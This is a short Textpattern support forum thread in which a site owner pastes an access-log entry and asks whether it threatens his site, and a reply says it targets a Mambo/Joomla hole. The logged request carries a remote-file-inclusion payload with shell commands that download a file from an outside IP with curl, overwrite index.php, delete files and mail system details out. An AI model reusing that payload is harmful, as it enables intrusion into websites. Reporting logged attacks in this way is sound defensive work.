Textpattern CMS support forum
You are not logged in. Register | Login | Help
- Topics: Active | Unanswered
Pages: 1
TXP hack-attempts
Hi guys,
I’ve noticed this little bugger in my logs:
/index.php?option=com_content&do_pdf=1&id=1index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://220.194.57.112/~photo/cm?&cmd=cd%20cache;curl%20-O%20http://220.194.57.112/~photo/cm;mv%20cm%20index.php;rm%20-rf%20cm*;uname%20-a%20|%20mail%20-s%20uname_i2_207.58.189.58%20kkparoleyahoo.com;uname%20-a%20|%20mail%20-s%20uname_i2_207.58.189.58%20maidatedreaqu@yahoo.com;echo|@
This website is running 4.0.3 (r1183). Is this a security issue? It’s calling the root of the website, not in /textpattern .
I was reading that since 4.0.x, publish.php?txpcfg[txpath] and other similar issues were patched. Should I worry?
Offline
Re: TXP hack-attempts
They are targetting a Mambo/Joomla vulnerabilty, so you shouldn’t be in danger. Anyhow, this appeal is still true.
Offline
Re: TXP hack-attempts
Cheers Robert for the quick reply. When I started with TXP, I didn’t really have the appropriate konwledge of its inner-workings, so there are a lot of hacks in 4.0.2, 4.0.3, upgrading to 4.0.4 not being as easy :(. I will have to sort it out at some point though.
Cheers again, Gerhard.
Offline
Pages: 1